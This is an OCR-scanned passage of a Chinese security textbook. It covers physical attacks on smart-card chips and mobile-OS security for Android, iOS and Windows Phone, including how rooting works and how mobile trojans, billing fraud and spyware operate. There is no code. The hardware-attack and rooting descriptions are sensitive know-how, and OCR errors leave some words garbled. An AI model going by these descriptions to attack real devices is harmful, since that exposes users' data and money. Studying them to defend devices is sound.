易 的 。 另 一 种 可 以 突破 这 层 钝 化 膜 的 技术 是 利用 超声 波 震动 形成 的 可 探测 点 来 进行 探测 。 
另外 ， 激 光 切 割 显 微 技术 也 可 以 局 部 移 除 钝 化 层 。 有 研究 表明 ， 通 过 一 个 九 探头 的 探测 
工具 可 以 读 出 卡 里 总 线 上 的 数据 。 

@ 高 级 攻击 技术 

最 近 的 研究 提出 了 一 种 攻击 方法 可 以 揭露 芯片 上 的 N 和 了 涂 层 , 这 就 相当 于 揭露 了 
芯片 内 部 结构 , 利用 电子 束 可 以 清楚 地 看 到 芯片 内 部 用 于 构成 晶体 管 的 细微 的 金属 薄膜 。 
将 其 放大 后 利用 计算 机 的 图 像 处 理 技 术 就 可 以 将 芯片 内 部 结构 图 展现 出 来 。 一 旦 芯片 的 
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结构 和 功能 知道 后 ， 就 可 以 来 观察 它 内 部 的 操作 。 不 用 移 除 芯片 上 的 钝 化 层 ， 利 用 紫外 
激光 束 通过 一 个 锯 化 锂 唱 体 的 照射 ， 可 以 有 效 地 读 出 芯片 中 电压 的 变化 。 如 果 清 楚 地 知 
道 卡 操作 流程 ， 就 很 容易 地 恢复 出 密 钥 来 。 还 有 资料 显示 ， 通 过 采用 红外 线 波长 的 激光 
可 以 从 芯片 的 背面 穿 透 它 的 保护 层 而 看 清 内 部 结构 。 另 一 种 是 采用 高 能 离子 束 的 设备 ， 
可 以 轻易 切断 芯片 底层 的 连 线 ， 并 分 离 或 刻 出 新 的 连 线 ， 通 过 灌输 离子 改变 芯片 上 硅 涂 
层 的 面积 ， 甚 至 可 以 在 芯片 的 最 底层 生成 新 的 导电 通路 等 。 利 用 这 些 强 有 力 的 工具 ， 使 
对 智能 卡 的 攻击 变 得 相对 简单 。 一 种 典型 的 攻击 是 将 连接 CPU 的 几乎 所 有 BUS 切断 ， 
(URRY EEPROM 和 CPU 的 连接 ， 通 过 一 个 程序 计数 器 从 旁 连接 到 EEPROM 上 来 模拟 
时 钟 。 然 后 攻击 者 仅 需要 一 个 简单 的 微 探 头 或 光电 探头 就 可 以 读 出 EEPROM 的 全 部 
内 容 。 

(5) 防范 措施 

一 般 而 言 ， 增 强 对 智能 卡 攻击 的 防范 ， 可 以 通过 加 密 硬件 或 采用 更 强 的 密码 算法 或 
协议 。 另 外 可 以 根据 上 面 的 模型 来 有 效 地 减少 系统 的 分 离 部 分 。 

© 加 密 硬件 。 采 用 加 密 硬件 的 方式 从 底层 实现 对 系统 的 保护 可 以 说 是 信息 安全 的 
一 个 发 展 趋势 (如 KOM 体系 ) 。 其 基本 思想 是 对 指令 一 级 的 加 密 和 对 存储 区 的 加 密 存 
储 及 访问 。 比 如 Dallas 公司 的 DS5002FP 安全 处 理 器 就 是 采用 的 这 种 总 线 加 密 技术 ， 指 
令 和 数据 的 存储 均 采 用 的 加 密 方式 。 这 种 方式 的 一 个 很 显著 的 好 处 是 极 大 地 扩大 了 外 部 
RAM 的 容量 ， 因 为 指令 级 的 加 密使 得 对 外 部 RAM 的 存 取消 除了 安全 隐患 。 但 这 并 不 是 
绝对 安全 的 ， 有 研究 表明 针对 它 的 攻击 往往 采用 最 简单 的 “加 密 指 令 穷 举 ” 的 方式 。 

@ 功能 合并 。 两 个 不 同 功能 合并 ， 这 两 者 之 间 可 能 的 攻击 也 就 随 之 消失 。 反 之 ， 
如 果 在 系统 中 增加 一 个 部 分 ， 就 会 带 来 安全 隐患 。 比 如 终端 和 卡 的 分 离 就 可 以 导致 诸如 
“中 间 人 攻击 ”的 危险 。 这 在 系统 设计 初始 阶段 要 从 总 体 上 考虑 的 。 

因此 要 清楚 地 划分 智能 卡 系统 各 个 部 分 的 安全 界限 很 困难 ， 但 是 通过 分 析 它 们 之 间 
的 相互 关系 以 及 可 能 存在 的 潜在 威胁 ， 可 以 大 概 地 规划 出 卡 系统 的 防御 措施 。 


8.3.2 ”智能 终端 


随 着 无 线 网 络 和 移动 通信 技术 的 发 展 ， 智 能 终端 操作 系统 越 来 越 流 行 ， 智 能 终端 功 
能 日 趋 强大 ， 应 用 越 来 越 广泛 。 它 们 能 够 在 任何 时 间 任 何 地 方 ， 快 速 便捷 地 访问 信息 和 
提供 即时 的 通信 。 根 据 调查 显示 ， 智 能 终端 用 户 使 用 他 们 的 无 线 设备 不 仅仅 为 了 娱乐 ， 
还 用 来 收发 邮件 、 即 时 消息 聊天 、 浏 览 网 页 、 通 过 网 络 下载 和 共享 文件 ， 甚 至 用 来 核算 
财政 的 账目 。 这 项 调查 发 现 54% 智 能 终端 用 户 会 通过 手机 收发 机 密 信息 的 电子 邮件 ， 超 
过 40% 的 用 户 会 使 用 手机 存 取 他 们 的 银行 账户 信息 , 有 近 三 分 之 一 的 用 户 会 在 手机 上 存 
取 其 信用 卡 的 账户 资料 。 多 数 的 智能 终端 用 户 同样 在 手机 设备 上 存储 机 密 的 私人 、 商 业 
或 者 客户 数据 。 智 能 终端 逐渐 地 被 当 作 移 动 的 PC 所 使 用 。 

然而 就 如 同 PC 计算 机 一 样 ,智能 终端 同样 暴露 在 众多 的 网 络 攻击 和 安全 威胁 之 下 。 
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智能 终端 的 设计 和 体系 结构 实现 是 非常 复杂 的 ， 它 所 使 用 的 网 络 协议 同样 如 此 。 这 些 复 
杂 性 使 得 手机 系统 在 实现 和 使 用 上 会 存在 一 些 弱 点 ， 容 易 受到 不 同 种 类 的 攻击 。 现 有 智 
能 终端 操作 系统 主要 包括 Android、Windows Phone、iOS 等 ， 本 文 将 对 此 三 系统 的 安全 
性 特点 以 及 安全 防护 方法 进行 介绍 。 


Android 是 一 种 基于 Linux 的 自由 及 开放 源 代码 的 操作 系统 ， 主 要 使 用 于 移动 设备 
如 智能 终端 和 平板 电脑 ， 由 Google 公 司 和 开放 手机 联盟 领导 及 开发 。 尚 未 有 统一 中 文 名 
称 ， 中 国 大 陆地 区 很 多 人 使 用 “ 安 卓 ”或 “ 安 致 ”。 

Android 的 系统 架构 采用 了 分 层 架 构 的 思想 , 如 图 8-5 所 示 。 从 上 层 到 底层 共 包 括 四 
层 ， 分 别 是 应 用 程序 层 、 应 用 程序 框架 层 、 系 统 库 和 Android 运行 时 、Linux 内 核 。 
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APPLICATION FRAMEWORK 


Providers System Manager 
adage -- are . or Manager Manager x PS ~ 


LIBRARIES ANDROID RUNTIME 


Core Lares 


LINUX KERNEL 


图 8-5 安 卓 系统 架构 


(1) 应 用 程序 层 

该 层 提 供 一 些 核心 应 用 程序 包 ， 例 如 电子 邮件 、 短 信 、 日 历 、 地 图 、 浏 览 器 和 联系 
人 管理 等 。 同 时 ， 开 发 者 可 以 利用 Java 语言 设计 和 编写 属于 自己 的 应 用 程序 ， 而 这 些 程 
序 与 那些 核心 应 用 程序 彼此 平等 、 友 好 共处 。 

(2) 应 用 程序 框架 层 

该 层 是 Android 应 用 开发 的 基础 。 应 用 程序 框架 层 包 括 活动 管理 器 、 窗 口 管理 器 、 
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内 容 提供 者 、 视 图 系统 、 包 管理 器 、 电 话 管理 器 、 资 源 管理 器 、 位 置 管理 器 、 通 知 管理 
器 和 XMPP 服务 10 个 部 分 。 在 Android 平台 上 ， 开 发 人 员 可 以 完全 访问 核心 应 用 程序 
所 使 用 的 API 框架。 并且， 任何 一 个 应 用 程序 都 可 以 发 布 自身 的 功能 模块 ， 而 其 他 应 用 
程序 则 可 以 使 用 这 些 已 发 布 的 功能 模块 。 基 于 这 样 的 重用 机 制 ， 用 户 就 可 以 方便 地 替换 
平台 本 身 的 各 种 应 用 程序 组 件 。 

(3) 系统 库 和 Android 运行 时 

系统 库 包括 九 个 子 系统 , 分 别 是 图 层 管理 、 媒 体 库 \SQLite`.OpenGLEState FreeType. 
WebKit, SGL, SSL 和 libc。Android 运行 时 包括 核心 库 和 Dalvik 虚拟 机 ， 前 者 既 兼 容 
了 大 多 数 Java 语言 所 需要 调用 的 功能 函数 , 又 包括 了 Android 的 核心 库 , 比如 android.os、 
android.net, android.media 等 等 。 后 者 是 一 种 基于 寄存 器 的 Java 虚拟 机 ，Dalvik 虚拟 机 
主要 是 完成 对 生命 周期 的 管理 、 堆 栈 的 管理 、 线 程 的 管理 、 安 全 和 异常 的 管理 以 及 垃圾 
回收 等 重要 功能 。 

(4) Linux 内 核 

Android 核心 系统 服务 依赖 于 Linux2.6 内 核 ， 如 安全 性 、 内 存 管理 、 进 程 管理 、 网 
络 协议 栈 和 驱动 模型 。Linux 内 核 也 是 作为 硬件 与 软件 栈 的 抽象 层 。 驱 动 有 显示 驱动 、 
摄像 头 驱动 、 键 盘 驱动 、WiFi 驱动 、Audio 驱动 、flash 内 存 驱 动 、Binder (IPC) 驱动 、 
电源 管理 等 。 

Android 是 一 个 基于 Linux 核心 的 开放 手机 平台 操作 系统 , 系统 提供 开放 的 源 代 码 
开发 平台 ， 便 于 应 用 程序 开发 者 方便 、 自 由 地 开发 。 每 个 开发 者 都 可 以 访问 系统 应 用 程 
序 框架 层 的 API 框架 , 根据 自己 的 设想 和 需要 开发 各 具 特 色 的 软件 。Android 系统 开放 、 
兼容 的 特点 使 其 应 用 范围 日 益 广 泛 ， 发 展 前 景 十 分 广阔 。 

Android 系统 从 安全 角度 出 发 , 在 设计 时 引入 了 一 些 安全 机 制 , 如 Linux 安全 机 制 、 
应 用 程序 权限 控制 机 制 、 强 制 类 型 安全 、 签 名 机 制 等 。 但 与 此 同时 ，Android 系统 的 开 
放 平台 以 降低 安全 性 能 为 代价 ， 恶 意 病毒 软件 开发 者 可 以 利用 Android 系统 提供 的 开放 
平台 ， 基 于 应 用 程序 发 动 攻击 ， 制 造 并 传播 各 种 手机 病毒 ， 通 过 推广 软件 、 广 告 单 击 、 
恶意 扣 费 、 发 送 垃圾 短信 等 多 种 方式 从 中 获取 不 法 收益 ， 给 手机 用 户 带 来 巨大 的 损失 。 
现在 国内 发 布 软件 的 电子 市 场 多 缺乏 认证 机 制 ， 用 户 下 载 未 知 来 源 的 应 用 软件 时 ， 很 容 
易 感 染 手机 病毒 ， 存 在 一 定 的 安全 隐患 。 
8.3.2.2 iOS 系统 

iOS 是 由 苹果 公司 开发 的 移动 操作 系统 。 苹 果 公 司 最 早 于 2007 年 1 月 9 日 的 
Macworld 大 会 上 公布 这 个 系统 ， 最 初 是 设计 给 iPhone 使 用 的 ， 后 来 陆续 套用 到 iPod 
Touch, iPad 以 及 Apple TV 等 产品 上 。iOS 与 苹果 的 Mac OS 和 操作 系统 一 样 ， 属 于 类 
Unix 的 商业 操作 系统 。 原 本 这 个 系统 名 为 iPhone OS, KA iPad, iPhone, iPod touch 都 
使 用 iPhone OS， 所 以 2010WWDC 大 会 上 宣布 改名 为 iOS GOS 为 美国 Cisco 公司 网 络 
设备 操作 系统 注册 商标 ， 荚 果 改 名 已 获得 Cisco 公司 授权 ) 。 
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iOS 的 系统 架构 分 为 四 个 层次 : 核心 操作 系统 层 (Core OS layer)、 核 心服 务 层 (Core 
Services layer) 、 媒 体 层 (Media layer) 和 可 触摸 层 (Cocoa Touch layer) 。 如 图 8-6 


所 示 。 


图 8-6 IOS 系统 架构 


(1) Core OS 

位 于 iOS 系统 架构 最 下 面 的 一 层 是 核心 操作 系统 层 ， 它 包括 内 存 管理 、 文 件 系统 、 
电源 管理 以 及 一 些 其 他 的 操作 系统 任务 。 它 可 以 直接 和 硬件 设备 进行 交互 。 作 为 App 开 
发 者 不 需要 与 这 一 层 打 交道 。 

(2) Core Services 

核心 服务 层 ， 可 以 通过 它 来 访问 iOS 的 一 些 服务 。 

(3) Media 

媒体 层 , 通过 它 我 们 可 以 在 应 用 程序 中 使 用 各 种 媒体 文件 , 进行 音频 与 视频 的 录制 ， 
图 形 的 绘制 ， 以 及 制作 基础 的 动画 效果 。 

(4) Cocoa Touch 

可 触摸 层 ， 这 一 层 为 我 们 的 应 用 程序 开发 提供 了 各 种 有 用 的 框架 ， 并 且 大 部 分 与 用 
户 界面 有 关 ， 本 质 上 来 说 它 负责 用 户 在 iOS 设备 上 的 触摸 交互 操作 。 

iOS 在 设计 之 初 即 以 安全 作为 其 设计 核心 。 相 比 于 安 卓 手机 系统 ，iOS 的 安全 性 能 
较 高 。iOS 用 户 下 载 应 用 软件 方式 单一 ， 需 要 通过 iPhone App Store， 任 何 可 执行 代码 都 
要 用 苹果 公司 授权 的 证 书 进行 签名 ， 对 开发 者 进行 身份 验证 ， 而 只 有 经 过 严格 安全 审查 
的 安全 软件 才能 在 iPhone App Store 上 发 布 。 苹 果 对 于 API 的 限制 在 某 种 程度 上 限制 了 
应 用 软件 的 功能 ， 开 发 者 只 能 通过 调用 开放 的 API 接口 实现 想 要 的 功能 ， 封 闭 式 的 措施 
提高 了 iOS 手机 系统 的 安全 性 能 。 

iOS 系统 的 安全 机 制 给 用 户 创建 了 一 个 相对 安全 的 系统 环境 ， 但 无 法 阻挡 手机 病毒 
侵入 的 企图 。 病 毒 制造 者 利用 iOS 系统 存在 的 漏洞 伪装 正常 短信 发 送 欺诈 短信 ， 通 过 伪 
装 欺骗 用 户 获 取 权 限 安装 含有 恶意 病毒 的 软件 。iOS 系统 严格 的 审批 机 制 使 得 许多 用 户 
纷纷 越狱 , 跳 过 审批 机 制 免费 下 载 第 三 方 应 用 软件 , 在 获得 方便 的 同时 提高 了 系统 风险 ， 
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增加 了 手机 感染 恶意 病毒 的 机 率 。 
8.3.2.3 Windows Phone 系统 

Windows Phone( 简 称 为 WP) 是 微软 于 2010 年 10 月 21 日 正式 发 布 的 一 款 手机 操作 
系统 ， 初 始 版 本 命名 为 Windows Phone 7.0。 基 于 Windows CE 内 核 ， 采 用 了 一 种 称 为 
Metro 的 用 户 界 面 (UD， 并 将 微软 旗下 的 Xbox Live 游 戏 、Xbox Music 音 乐 与 独特 的 视频 
体验 集成 至 手机 中 。 

Windows Phone 7 架构 基于 Windows Embedded CE 6.0 内 核 ， 主 要 包括 三 个 组 件 区 
域 ， 内 核 模式 和 用 户 模式 组 件 ( 软 件 层 ) 、 硬 件 组 件 。 

在 Windows Phone 8.1 版 本 中 , 包含 有 大 量 新 功能 ， 并 对 Windows Phone 8 的 部 分 功 

进行 了 改进 。 除 语音 助手 Cortana, Start Screen 背景 等 功能 外 ，Windows Phone 8.1 还 
包含 有 数 项 安全 功能 ， 使 得 它 成 为 目前 市 场 上 最 安全 的 手机 操作 系统 之 一 。 

Windows Phone 8.1 内 置 移动 设备 管理 (以 下 简称 “MDM ”) 功 能 ， 有 助 于 企业 管理 
员工 在 工作 中 使 用 的 自 有 移动 设备 和 企业 配备 的 移动 设备 。 员 工 的 设备 可 以 方便 地 访问 
Microsoft Exchange、SharePoint、 公 司 WiFi 网 络 等 服务 。 企 业 可 以 选择 允许 移动 设备 安 
装 的 应 用 ， 制 定 设置 政策 ， 利 用 MDM 系统 直接 把 相关 设置 推送 到 员工 的 设备 。 

Windows Phone 8.1 的 另外 一 项 安全 功能 是 支持 S/MIME( 安 全 的 多 目标 邮件 扩展 )。 
诺基亚 称 ，“ 手 机 上 的 Outlook 客户 端 包含 发 送 加 密 的 数字 签名 电子 邮件 的 选项 。IT 部 
门 也 可 以 在 手机 上 配置 支持 Exchange Server 的 S/MIME 功能 。 加 密 的 数字 签名 电子 邮件 
是 防止 数据 泄露 的 一 种 好 方式 。” 

Windows Phone 8.1 支持 基于 IPsec 和 SSL 标准 的 VPN( 虚 拟 专用 网 )， 使 用 户 能 访问 
安全 的 企业 网 络 。 企 业 IT 部 门 能 设置 哪些 应 用 会 自动 触发 VPN 连接 ， 这 意味 着 员工 无 
须 进 行 任何 设置 。 

Windows Phone 8.1 还 支持 远程 删除 数据 功能 。 如 果 手 机 丢失 或 被 窃 , 用 户 可 以 远程 
删除 手机 上 所 有 数据 。 用 户 可 以 通过 Windows Live 服务 自行 删除 数据 ， 也 可 以 与 IT 前 
门 联系 ， 请 他 们 代劳 。 
8.3.2.4 智能 终端 的 主流 OS 的 安全 防护 

出 于 安全 的 考虑 ， 许 多 智能 终端 操作 系统 对 用 户 和 应 用 程序 的 权限 进行 了 限制 。 正 
常情 况 下 ， 用 户 和 非 系统 应 用 程序 仅 在 系统 中 拥有 较 低 的 权限 。 对 于 iOS 设备 和 
Windows Phone 等 设备 来 说 ， 没 有 经 过 官方 授权 的 应 用 程序 是 无 法 运行 的 ， 所 以 用 户 只 

安装 和 使 用 在 官方 的 应 用 商店 (如 苹果 的 App Store) 中 下 载 的 软件 ; 对 于 Android 终 
端 设 备 ， 用 户 只 能 安装 设备 生产 商 提供 的 系统 固件 。 许 多 优秀 的 应 用 软件 为 了 更 大 发 挥 
手机 的 性 能 ， 会 涉及 系统 底层 的 操作 ， 必 须要 “越狱 ”后 才能 正常 使 用 。 对 于 种 种 权限 
限制 ， 许 多 用 户 在 使 用 中 感到 非常 不 方便 ， 因 此 就 有 黑客 利用 系统 漏洞 ， 开 发 了 可 以 破 
解 权 限 限 制 的 工具 提供 给 用 户 使 用 ， 用 户 通过 这 些 工 具 可 以 获得 并 使 用 系统 最 高 权 
限 一 一 Root (管理 员 ) 权限 ， 这 就 是 所 谓 的 “越狱 ” (在 Android 系统 中 ， 也 称 “ 越 狱 ” 
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为 Root) 。 下 面 以 Android 系统 为 例 ， 说 明 “越狱 ”的 原理 和 过 程 。 

Android 系统 是 建立 在 Linux 内 核 的 基础 上 的 , 继承 了 Linux 基于 用 户 和 属 组 的 权 
限 控制 方式 。 每 个 应 用 程序 都 是 一 个 用 户 , 在 系统 中 都 有 自己 唯一 的 ID (Root 的 ID 为 
0) 。 对 于 涉及 系统 底层 的 操作 , 普通 用 户 权限 不 够 , 不 能 直接 执行 , 而 是 切换 成 Root 以 
Root 的 身份 才能 执行 。 完 成 用 户 切换 是 由 系统 /system/xbin 目录 下 的 su 程序 完成 的 。 

“越狱 ”时 ， 使 用 修改 后 的 不 过 滤 切 换 请 求 的 su 程序 蔡 换 系统 原 有 su， 使 所 有 程 
序 都 能 够 切换 成 Root, 执行 所 有 涉及 底层 的 操作 。 而 执行 这 些 的 操作 的 前 提 ， 也 是 要 获 
得 Root 权限 ， 这 时 只 能 利用 某 个 系统 漏洞 ， 通过 运行 针对 这 个 漏洞 的 exploit 程序 来 获 
得 。“ 越 狱 ” 之 后 ， 所 有 的 应 用 程序 均 能 通过 新 的 su 程序 来 切换 成 Root， 执 行 之 前 不 
进行 的 操作 。 

用 户 可 以 安装 没有 经 过 官方 审查 和 授权 的 软件 到 “越狱 ”后 的 iOS 和 Windows 
Phone 中 ， 也 可 以 为 Root 后 的 Android 手机 更 换 第 三 方 开发 者 开发 的 Android 固件 
〈 称 为 “刷机 ”) “越狱 ”后 的 权限 提升 虽然 能 让 用 户 和 应 用 程序 进行 更 多 的 操作 ， 但 是 
与 此 同时 ， 由 于 打破 了 系统 原 有 的 安全 机 制 ， 用 户 无 法 保证 未 授权 的 软件 中 是 否 含有 恶 
意 代码 ， 也 无 法 保证 第 三 方 开发 者 开发 的 系统 固件 中 是 否 被 植 入 恶意 软件 ， 而 且 第 三 方 
开发 者 发 布 的 系统 固件 往往 比 官方 发 布 的 版 本 有 更 多 的 安全 漏洞 。 更 为 严重 的 是 ， 如 前 
文中 关于 对 系统 破坏 类 恶意 软件 的 说 明 ， 一 旦 恶意 软件 非法 获得 了 Root 权限 ， 其 破坏 
力 和 威胁 性 大 大 增强 。 

恶意 软件 伪装 成 正常 软件 通过 软件 分 发 网 站 植 入 对 于 目前 受 恶 意 软 件 侵 害 最 为 严 
WW Android 平台 , 恶意 软件 的 泛滥 不 仅 与 其 较 高 的 市 场 占有 率 有 关 , 也 与 Android 应 
用 程序 安装 包 的 特性 有 关 。Android 系统 的 软件 安装 包 非 常 容易 被 反 编译 而 直接 得 到 源 
代码 ， 所 以 不 法 分 子 可 以 轻易 将 恶意 代码 插入 到 正常 的 应 用 软件 中 去 ， 然 后 重新 编译 发 
布 。 许 多 恶意 代码 嵌入 在 时 下 非常 热门 和 流行 的 应 用 软件 中 ， 通 过 论坛 和 非 官方 的 应 用 
商店 进行 大 范围 传播 。 

以 国内 为 例 ， 随 着 Android 用 户 的 迅速 增长 ， 出 现 了 许多 相关 的 Android 论坛 ， 
很 多 国内 开发 者 在 坛 上 发 布 自己 开发 或 者 汉化 、 破解 的 应 用 , 免费 提供 给 用 户 下 载 安装 。 
另 一 方面 ， 由 于 国内 访问 谷歌 官方 的 Android 应 用 商店 Android Market 速度 较 慢 ， 且 
应 用 商店 的 设计 并 不 符合 大 多 数 中国 用 户 的 使 用 习惯 ,出现 了 许多 “本 土 ” 的 第 三 方 应 
用 商店 。 因 为 缺少 严格 、 专 业 的 审核 机 制 ， 难 以 保证 在 论坛 和 第 三 方 应 用 商店 上 发 布 的 
软件 的 安全 性 。 报 告 数据 显示 ， 手 机 论坛 的 危险 指数 在 不 断 上 升 ， 以 37% 的 比例 成 为 
传播 恶意 软件 的 重 灾区 ，29% 的 用 户 通过 第 三 方 应 用 商店 下 载 而 感染 恶意 软件 。 

“越狱 ”后 的 Android 手机 由 于 没有 了 权限 限制 ， 用 户 可 以 进行 “刷机 ”操作 。 大 
多 数 用 户 “ 刷 ”的 是 经 过 修改 、 美 化 的 第 三 方 Android 系统 固件 ， 恶 意 软件 就 可 能 随 着 
这 些 第 三 方 Android 系统 固件 植 入 到 用 户 的 手机 中 。 通过 固件 植 入 的 恶意 软件 伪装 成 系 
统 程序 ， 隐 蔽 性 更 好 ， 更 不 容易 被 用 户 察觉 。 而 且 ， 务 载 随 固件 安装 的 程序 是 需要 系统 
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的 最 高 权限 的 ， 但 是 绝 大 多 数 的 安防 软件 不 会 主动 获取 手机 的 最 高 权限 ， 即 使 发 现 也 无 
法 清除 这 种 恶意 软件 。 虽 然 目 前 已 发 现 的 通过 固件 植 入 的 恶意 软件 较 少 ， 但 如 “ 白 卡 吸 
费 王 ”， 其 对 用 户 的 危害 性 却 更 大 。 

和 近日， 苹果 产品 安全 问题 专家 ，Accuvant Labs 的 研究 员 查 理 米 勒 (Charlie Miller) 
发 现 苹果 iOS 平台 存在 一 个 安全 漏洞 。 攻 击 者 可 能 会 利用 这 个 漏洞 通过 一 些 恶 意 软 件 
在 用 户 的 苹果 产品 上 悄悄 安装 恶意 程序 ， 进 而 窃取 用 户 隐私 或 破坏 用 户 数据 。 他 还 开发 
了 一 款 恶 意 软件 原型 “Instastock” 来 测试 该 漏洞 ， 上 传 到 了 苹果 App Store 应 用 商店 ， 
日 通 过 了 苹果 的 安全 审批 。 

对 于 具有 间谍 软件 性 质 的 监控 类 软件 ， 多 是 通过 社会 工程 学 等 手段 ， 手 工 植 入 到 用 
户 手机 中 的 ， 如 前 文 提 到 的 家 长 控制 工具 “Kidlogger”。 还 有 臭名 昭著 的 “X 卧底 ”， 
早期 版 本 也 是 手工 植 入 的 方式 。 这 种 植 入 方法 非常 有 针对 性 ， 也 往往 更 关注 的 是 被 监控 
用 户 的 隐私 ， 用 来 做 婚外恋 调查 、 商 业 和 政府 机 密 窃 取 等 不 可 告 人 行为 。 

Android 应 用 软件 安装 包 中 可 以 包含 原始 的 、 不 会 被 压缩 的 资源 文件 〈 存 放 在 安装 
包 /res/raw 目录 中 ) ， 这 就 给 了 攻击 者 可 乘 之 机 ， 他 们 将 恶意 软件 直接 捆绑 到 普通 软件 
中 ， 普 通 软件 安装 后 ， 恶 意 软 件 安装 包 被 释放 ， 然 后 安装 到 用 户 手 机 中 。 最 近 发 现 了 一 
款 隐藏 在 “绿色 家 园 ” 等 应 用 软件 安装 包 中 的 木马 ， 正 常 应 用 程序 安装 后 ， 会 释放 出 一 
个 名 为 Testnew.Apk 的 木马 子 包 ， 这 个 子 包 会 自动 安装 到 用 户 手 机 上 ， 实 施 恶意 行为 。 

诱骗 用 户主 动 下 载 恶 意 软件 的 方式 比较 多 ， 有 的 是 通过 发 送 给 用 户 带 有 恶意 软件 下 
载 链接 的 短信 、 彩 信 ， 并 附 上 诱惑 性 的 说 明文 字 ， 诱 导 用 户 去 单 击 下 载 : 或 者 打 着 热门 
应 用 软件 的 名 号 、 欺 骗 用 户 、 导 致 用 户 下 载 的 其 实 是 恶意 软件 ; 还 有 的 则 是 利用 二 维 码 ， 
用 户 使 用 手机 中 的 二 维 码 识别 软件 扫描 后 得 到 恶意 软件 下 载 地 址 。 

有 些 恶 意 软 件 内 部 含有 “下 载 器 ”， 安 装 后 还 能 在 后 台 源源 不 断 地 下 载 其 他 恶意 软 
件 到 用 户 的 手机 中 ， 如 前 文 提 到 的 恶意 软件 “Geinimi”。 
8.3.2.5 智能 终端 应 用 安全 

恶意 软件 是 目前 移动 智能 终端 上 被 不 法 分 子 利 用 最 多 、 对 用 户 造成 危害 和 损失 最 大 
的 安全 威胁 类 型 。 智 能 终端 操作 系统 的 多 任务 特性 , 为 恶意 软件 在 后 台 运 行 提供 了 条 件 ， 
而 用 户 对 恶意 软件 的 运行 毫 不 知情 。 数 据 显示 目前 Android 平台 恶意 软件 主要 有 四 种 类 
型 : 远程 控制 木马 、 话 费 吸取 类 、 隐 私 窃取 类 和 系统 破坏 类 。 

远程 控制 木马 可 以 接收 攻击 者 远程 发 送 的 各 种 指令 ， 进 而 触发 恶意 行为 。 与 其 他 恶 
意 软 件 在 威胁 方式 上 有 较 大 不 同 ， 其 威胁 是 动态 的 、 可 变 的， 恶意 行为 的 类 型 根据 攻击 
者 下 达 的 具体 指令 的 不 同 而 改变 ， 因 此 使 用 户 层面 临 着 多 个 层次 的 安全 威胁 。 

远程 控制 木马 工作 原理 : 

O 隐私 窃取 。 根 据 攻击 者 的 指令 ， 木 马 可 以 搜集 用 户 的 短信 内 容 、 联 系 人 、 通 话 
记录 、 手 机 IMEI 码 、 当 前 位 置 坐 标 等 数据 上 传 到 指定 的 服务 器 上 。 有 些 木马 接收 到 指 
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令 后 ， 甚 至 可 以 进行 通话 录音 和 背景 声音 录音 ， 从 而 达到 通话 监听 和 背景 声音 监听 的 
目的 。 

@ 吸 费 扣 费 。 很 多 远程 控制 木马 同样 具有 话费 吸取 的 功能 ， 攻 击 者 在 指令 中 给 出 
增值 业务 号 码 ， 控 制 手机 发 送 短信 进行 定制 。 与 一 般 话 费 吸 取 软 件 不 同 的 是 ， 增 值 业务 
号 码 是 可 以 根据 攻击 者 指令 更 换 的 。 

O 恶意 推广 。 远 程控 制 木马 能 够 接收 攻击 者 的 指令 ， 连 接 到 指定 的 下 载 服务 器 ， 
下 载 恶 意 推广 的 软件 、 广 告 图 片 等 ， 还 能 自动 启动 浏览 器 访问 特定 的 恶意 推广 网 站 。 

© 更 新 和 下 载 其 他 恶意 软件 。 为 了 避免 安全 防护 软件 的 查 杀 ， 攻 击 者 可 以 控制 木 
马 连 接 到 更 新 服务 器 进行 更 新 。 还 可 以 下 载 更 多 种 类 和 数量 的 其 他 恶意 软件 ， 进 而 对 用 
户 造 成 更 加 严重 的 危害 。 攻 击 者 对 木马 的 远程 控制 主要 有 两 种 方式 : 基于 短信 的 控制 和 
基于 网 络 的 控制 。 基 于 短信 的 控制 是 攻击 者 向 安装 有 远程 控制 木马 的 手机 发 送 含 有 特殊 
指令 的 短信 ， 木 马 接收 后 进行 解析 并 执行 。 基 于 网 络 的 控制 是 木马 通过 与 控制 服务 器 进 
行 网 络 通信 获取 指令 并 解析 执行 。 基 于 网 络 可 以 进行 批量 监控 和 指令 下 达 ， 因 此 被 绝 大 
多 数 的 远程 控制 木马 所 采用 ， 另 外 也 有 少数 木马 采用 了 两 种 方式 结合 的 方法 。 

话费 吸取 软件 定时 在 系统 后 台 发 送 短信 到 增值 业务 服务 提供 商 ， 大 量 定制 增值 业 
务 ， 或 自动 拨打 指定 增值 业务 号 码 ， 并 且 能 自动 拦截 相关 业务 定制 后 的 确认 短信 和 运营 
商 的 资费 提醒 短信 ， 暗 地 里 “吸取 ”用 户 的 资费 。“ 安 卓 老 虎 机 ”是 一 款 疯狂 吸 费 的 
Android 恶意 软件 ， 分 析 表 明 ， 该 恶意 软件 以 10 秒 一 次 的 高 频率 触发 恶意 扣 费 行为 ， 
自动 删除 短信 发 送 记录 及 运营 商 的 确认 短信 ， 完 全 剥夺 了 用 户 对 手机 资费 的 知情 权 ， 用 
户 几 乎 不 可 能 在 第 一 时 间 得 知 自 己 已 被 扣 费 。 

有 一 些 恶 意 软件 能 实现 窃听 功能 ， 监 听 用 户 的 通话 录音 和 背景 环境 声音 ， 并 给 攻击 
者 留 下 后 门 ， 使 手机 沦 为 黑客 的 “肉鸡 ”。“ 人 金 雕 ” (Android.Hack.Golden Ege) 是 一 
款 功能 全 面 ， 设 计 精 巧 的 Android 后 门 病毒 。“ 人 金 雕 ”后 门 安装 到 Android 手机 之 后 ， 
不 会 留 下 任何 图 标 。 后 门 会 实现 自动 启动 ， 受 窃听 者 短信 指挥 实现 监听 短信 内 容 和 通话 
记录 的 功能 。 当 监听 到 手机 通话 时 ， 病 毒 会 启动 录音 服务 进行 录音 ， 通 话 结束 后 停止 录 
音 。 然 后 “ 金 雕 ”病毒 自 带 的 邮件 引擎 再 将 录音 文件 发 送 到 窃听 者 邮箱 。 

还 有 一 些 移动 智能 终端 上 的 远程 监控 软件 ， 虽 然 开 发 的 最 初 目 的 和 设计 用 途 并 不 一 
定 是 恶意 的 ， 但 是 一 旦 被 不 法 分 子 作为 间谍 软件 非法 利用 ， 也 将 会 对 用 户 隐 私 、 企 业 和 
政府 机 密 带 来 严重 威胁 。“Kidlogger" 是 国外 一 款 用 于 家 长 控制 孩子 上 网 的 产品 并 推出 了 
Android 平台 的 版 本 ， 能 够 记录 几乎 所 有 的 手机 操作 。 除 了 短信 、 电 话 和 联系 人 等 常规 
信息 ， 其 至 可 以 记录 剪贴 板 数 据 、Wi-Fi 和 USB 连接 记录 、 键 盘 按键 记录 等 ， 根 据 监 
